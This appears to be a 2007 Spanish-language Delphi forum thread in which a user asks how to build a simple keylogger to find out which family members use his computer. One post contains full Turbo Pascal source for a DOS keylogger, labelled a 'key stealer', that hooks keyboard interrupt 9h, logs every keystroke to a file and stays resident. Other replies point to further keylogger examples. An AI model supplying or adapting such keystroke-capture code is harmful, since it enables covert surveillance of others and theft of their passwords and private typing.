Club Delphi  
    FTP   CCD     Buscar   Trucos   Trabajo   Foros

Retroceder   Foros Club Delphi > Principal > Varios
Registrarse FAQ Miembros Calendario Guía de estilo Buscar Temas de Hoy Marcar Foros Como Leídos

Grupo de Teaming del ClubDelphi

Respuesta
 
Herramientas Buscar en Tema Desplegado
  #1  
Antiguo 05-11-2007
Avatar de jorgegetafe
jorgegetafe jorgegetafe is offline
Miembro
 
Registrado: dic 2006
Posts: 238
Poder: 18
jorgegetafe Va por buen camino
Haciendo mi propio keylogger

Hola he estado mirando por internet algún keylogger para registrar lo que se hace en mi ordenador, que lo usan niños pequeños y mis padres y muchas veces me joden las cosas y con un keylogger podría saber quien ha sido y demás, nunca con fines malignos, y la verdad es que no hay ninguno gratuito que no tenga troyanos.

¿Creeis que sería dificil crear mi propio keylogger? Estamos hablando de un keylogger completamente básico, grabar lo tecleado en un txt y fuera, sin ocultarse ni nada.

No conozco funciones relacionadas con la causa... gracias.
__________________
Explicate como si fuese tonto, soy nuevo en esto de hacer programas!!!! XD
Responder Con Cita
  #2  
Antiguo 05-11-2007
[egostar] egostar is offline
Registrado
 
Registrado: feb 2006
Posts: 6.556
Poder: 25
egostar Va camino a la fama
Dale una leída a los hilos que ves en la parte baja de esta página.

Salud OS
__________________
"La forma de empezar es dejar de hablar y empezar a hacerlo." - Walt Disney
Responder Con Cita
  #3  
Antiguo 05-11-2007
Avatar de jorgegetafe
jorgegetafe jorgegetafe is offline
Miembro
 
Registrado: dic 2006
Posts: 238
Poder: 18
jorgegetafe Va por buen camino
Gracias mirare a ver.
__________________
Explicate como si fuese tonto, soy nuevo en esto de hacer programas!!!! XD
Responder Con Cita
  #4  
Antiguo 05-11-2007
Avatar de jorgegetafe
jorgegetafe jorgegetafe is offline
Miembro
 
Registrado: dic 2006
Posts: 238
Poder: 18
jorgegetafe Va por buen camino
Para utilizar el siguiente código que sale en los enlaces que me has propuesto, necesito la unidad "DOS.dcu" ¿donde puedo conseguirla?
Código Delphi [-]
 
 
(*
   Hi
     This is Key-logger program (key Recorder/key stealer),
     written in Turbo Pascal 7 .
     to see the best result, run the file from "windows 9x MS-DOS Prompt"
     i think "command prompt" will crash and hang!
     as i test in "MS-DOS Prompt",it is perfect with no error!
     By: Afshin Zavar
     E-mail: Afshin_Z@Yahoo.com
     2003-2004
     IRAN-Tabriz    
    Please send me any bugs,suggestions,updated version and misspelling *)
{//////////////////////////////////////////////////////////////////////////////}
{$F+}                        (* enable far call (out of our Segments) *)
{$M $3200,0,1000}            {stack:=3200h,MinHeap:=0 and MaxHeap:=1000}
{$S-,R-}                     {disable stack overflow and range checking}
uses CRT,DOS;                {units}
var                          (* Global varibles (avalible in all our code) *)
 oldint9:Procedure;          {wanna save real int9h address}
 KeyScanCode:Byte;           {scan code of keys}
 KeyChar:String;             {name of keys}
 FP:Text;                    {file of text}
{***************[ This is new int.9 and will be resident ]*********************}
Procedure KeyPress;Interrupt;     { allways must be contain  "interrupt" }
 Begin
      mem[0:4]:=$AA;              { mark RAM }
      Append(fp);                 { Add more text onto end of file}
      KeyScanCode:=Port[$60];     { read key from Port 60h }
      Case KeyScanCode of         {check that which key pressed}
          1:KeyChar:='Esc ';
          2:KeyChar:='1 ';
          3:KeyChar:='2 ';
          4:KeyChar:='3 ';
          5:KeyChar:='4 ';
          6:KeyChar:='5 ';
          7:KeyChar:='6 ';
          8:KeyChar:='7 ';
          9:KeyChar:='8 ';
          10:KeyChar:='9 ';
          11:KeyChar:='0 ';
          12:KeyChar:='- ';
          13:KeyChar:='= ';
          14:KeyChar:='Bksp ';
          15:KeyChar:='Tab ';
          16:KeyChar:='Q ';
          17:KeyChar:='W ';
          18:KeyChar:='E ';
          19:KeyChar:='R ';
          20:KeyChar:='T ';
          21:KeyChar:='Y ';
          22:KeyChar:='U ';
          23:KeyChar:='I ';
          24:KeyChar:='O ';
          25:KeyChar:='P ';
          26:KeyChar:='[ ';
          27:KeyChar:='] ';
          28:KeyChar:='Enter ';
          29:KeyChar:='Ctrl ';
          30:KeyChar:='A ';
          31:KeyChar:='S ';
          32:KeyChar:='D ';
          33:KeyChar:='F ';
          34:KeyChar:='G ';
          35:KeyChar:='H ';
          36:KeyChar:='J ';
          37:KeyChar:='K ';
          38:KeyChar:='L ';
          39:KeyChar:='; ';
          40:KeyChar:='coma ';
          41:KeyChar:='` ';
          42:KeyChar:='LShift ';
          43:KeyChar:='\ ';
          44:KeyChar:='Z ';
          45:KeyChar:='X ';
          46:KeyChar:='C ';
          47:KeyChar:='V ';
          48:KeyChar:='B ';
          49:KeyChar:='N ';
          50:KeyChar:='M ';
          51:KeyChar:=', ';
          52:KeyChar:='. ';
          53:KeyChar:='/ ';
          54:KeyChar:='RShift ';
          55:KeyChar:='* ';
          56:KeyChar:='Alt ';
          57:KeyChar:='Space ';
          58:KeyChar:='CapsLock ';
          59:KeyChar:='F1 ';
          60:KeyChar:='F2 ';
          61:KeyChar:='F3 ';
          62:KeyChar:='F4 ';
          63:KeyChar:='F5 ';
          64:KeyChar:='F6 ';
          65:KeyChar:='F7 ';
          66:KeyChar:='F8 ';
          67:KeyChar:='F9 ';
          68:KeyChar:='F10 ';
          133:KeyChar:='F11 ';
          134:KeyChar:='F12 ';
          69:KeyChar:='NumLock ';
          70:KeyChar:='Scroll Lock ';
          71:KeyChar:='Home(7) ';
          72:KeyChar:='UP(8) ';
          73:KeyChar:='PgUp(9) ';
          74:KeyChar:='Gray - ';
          75:KeyChar:='Left(4) ';
          76:KeyChar:='Center(5) ';
          77:KeyChar:='Right(6) ';
          78:KeyChar:='Gray + ';
          79:KeyChar:='End(1) ';
          80:KeyChar:='Down(2) ';
          81:KeyChar:='PgDn(3) ';
          82:KeyChar:='Ins(0) ';
          83:KeyChar:='Del(.) ';
     End; {case}
     WriteLn(fp,KeyChar);     {write Key Name to file}
     Close(fp);               {close file}
                    (* now pass control of int9h to Operating System *)
   Inline ($9C);             {pushf}
   OldInt9;                  {call real int9 and then popf}
 End;
{****************[Main Body]*************************}
Begin
    Textcolor(LightGreen);
    if mem[0:4]=$AA then                {test our mark in RAM}
      begin
        writeln(#13,#10,'This program has been allready installed.');
        halt(0)                        {return ro the Operating system}  
      end;
    writeln(#13,#10,'KeyLogger Program Installed successfully!',#13,#10);
   Assign(fp,'\keylist.log');         {wanna to open file}
   Rewrite(fp);                       {Creates and opens a new file.}
   Close(fp);                         {close opened file}
   GetIntVec($9,@OldInt9);            {save real interrupt no.9h}
   SetIntVec($9,Addr(KeyPress));      {hook and change interrupt no.9h to our procedure }
   Keep(0);                           {Be TSR} 
End.
__________________
Explicate como si fuese tonto, soy nuevo en esto de hacer programas!!!! XD
Responder Con Cita
  #5  
Antiguo 05-11-2007
Avatar de ArdiIIa
[ArdiIIa] ArdiIIa is offline
Miembro Premium
 
Registrado: nov 2003
Ubicación: Valencia city
Posts: 1.481
Poder: 22
ArdiIIa Va por buen camino
Cita:
Empezado por jorgegetafe Ver Mensaje
¿Creeis que sería dificil crear mi propio keylogger?
Probaste el mío ??
__________________
Un poco de tu generosidad puede salvar la vida a un niño. ASÍ DE SENCILLO
Responder Con Cita
  #6  
Antiguo 05-11-2007
Avatar de jorgegetafe
jorgegetafe jorgegetafe is offline
Miembro
 
Registrado: dic 2006
Posts: 238
Poder: 18
jorgegetafe Va por buen camino
Cita:
Empezado por ArdiIIa Ver Mensaje
Probaste el mío ??
Tiene buena pinta, lastima que no dejes el código del programa, lo voy a probar, aunque lo ideal sería hacerme yo uno a medida.
__________________
Explicate como si fuese tonto, soy nuevo en esto de hacer programas!!!! XD
Responder Con Cita
  #7  
Antiguo 05-11-2007
Avatar de ArdiIIa
[ArdiIIa] ArdiIIa is offline
Miembro Premium
 
Registrado: nov 2003
Ubicación: Valencia city
Posts: 1.481
Poder: 22
ArdiIIa Va por buen camino
Cita:
Empezado por jorgegetafe Ver Mensaje
Tiene buena pinta, lastima que no dejes el código del programa, lo voy a probar, aunque lo ideal sería hacerme yo uno a medida.
Bueno, pues aunque no lo creas, hay bastante parte de código de ese programa repartido por el foro, aunque no para estos menesteres...

Tal vez, no tardando mucho, publique todo el código. Pero como dices, lo ideal es hacerse uno mismo a medida.

Saludos.
__________________
Un poco de tu generosidad puede salvar la vida a un niño. ASÍ DE SENCILLO
Responder Con Cita
  #8  
Antiguo 06-11-2007
Robert01 Robert01 is offline
Miembro
 
Registrado: feb 2006
Ubicación: Córdoba, Argentina
Posts: 895
Poder: 19
Robert01 Va por buen camino
Hola

Aquí tenés un ejemplo de keylogger hecho en delphi. Es bastante elemental pero tal vez te sirva aunque más no sea para ver como funciona.

Saludos
Responder Con Cita
Respuesta


Herramientas Buscar en Tema
Buscar en Tema:

Búsqueda Avanzada
Desplegado

Normas de Publicación
no Puedes crear nuevos temas
no Puedes responder a temas
no Puedes adjuntar archivos
no Puedes editar tus mensajes

El código vB está habilitado
Las caritas están habilitado
Código [IMG] está habilitado
Código HTML está deshabilitado
Saltar a Foro

Temas Similares
Tema Autor Foro Respuestas Último mensaje
keylogger? unko! Internet 9 12-04-2014 02:02:06
Abrir archivo propio desde Windows....en programa propio darkphantom Varios 12 22-02-2007 05:46:49
Que estoy haciendo Mal esimon SQL 4 04-07-2006 22:55:25
Keylogger Multi Lenguaje Problema con la Captura saratoga2k API de Windows 0 17-05-2006 22:15:07
Construir un KEYLOGGER SPARROW Varios 3 18-02-2004 15:27:00


La franja horaria es GMT +2. Ahora son las 15:08:40.


Powered by vBulletin® Version 3.6.8
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Traducción al castellano por el equipo de moderadores del Club Delphi
Copyright 1996-2007 Club Delphi